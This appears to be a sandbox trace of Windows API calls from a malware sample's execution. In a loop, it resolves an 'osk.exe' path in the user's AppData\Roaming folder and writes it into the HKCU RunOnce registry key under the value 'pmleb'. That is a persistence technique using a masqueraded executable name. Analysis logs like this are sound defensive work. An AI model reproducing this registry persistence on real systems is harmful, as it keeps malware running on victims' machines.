FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.203] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.203] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.203] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.203] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.203] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.203] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x72 [0092.203] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.204] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x73 [0092.204] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.205] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x72 [0092.205] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.205] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.205] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.205] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.205] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.205] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.205] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.205] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.205] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.205] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.206] RegCloseKey (hKey=0x280) returned 0x0 [0092.206] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.206] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.206] SetTimer (hWnd=0x20280, nIDEvent=0x21ee, uElapse=0xa, lpTimerFunc=0x0) returned 0x21ee [0092.206] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.217] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.217] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.217] KillTimer (hWnd=0x20280, uIDEvent=0x21ee) returned 1 [0092.217] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.218] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.218] IUnknown:Release (This=0x787518) returned 0x1 [0092.218] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.218] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.218] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.218] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.218] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.218] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.218] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.219] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.219] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.219] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x73 [0092.219] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.219] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x74 [0092.219] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.220] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x73 [0092.220] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.220] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.220] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.220] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.220] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.220] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.220] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.220] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.221] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.221] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.221] RegCloseKey (hKey=0x280) returned 0x0 [0092.221] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.221] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.221] SetTimer (hWnd=0x20280, nIDEvent=0x21ef, uElapse=0xa, lpTimerFunc=0x0) returned 0x21ef [0092.221] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.233] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.233] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.233] KillTimer (hWnd=0x20280, uIDEvent=0x21ef) returned 1 [0092.233] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.233] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.233] IUnknown:Release (This=0x787518) returned 0x1 [0092.234] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.234] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.234] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.234] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.234] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.234] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.234] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.234] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.234] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.234] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x74 [0092.235] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.235] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x75 [0092.235] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.236] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x74 [0092.236] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.236] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.236] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.236] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.236] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.236] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.236] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.236] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.236] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.236] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.237] RegCloseKey (hKey=0x280) returned 0x0 [0092.237] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.237] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.237] SetTimer (hWnd=0x20280, nIDEvent=0x21f0, uElapse=0xa, lpTimerFunc=0x0) returned 0x21f0 [0092.237] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.248] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.248] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.248] KillTimer (hWnd=0x20280, uIDEvent=0x21f0) returned 1 [0092.249] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.249] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.249] IUnknown:Release (This=0x787518) returned 0x1 [0092.249] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.249] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.249] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.250] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.250] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.250] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.250] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.250] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.250] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.250] 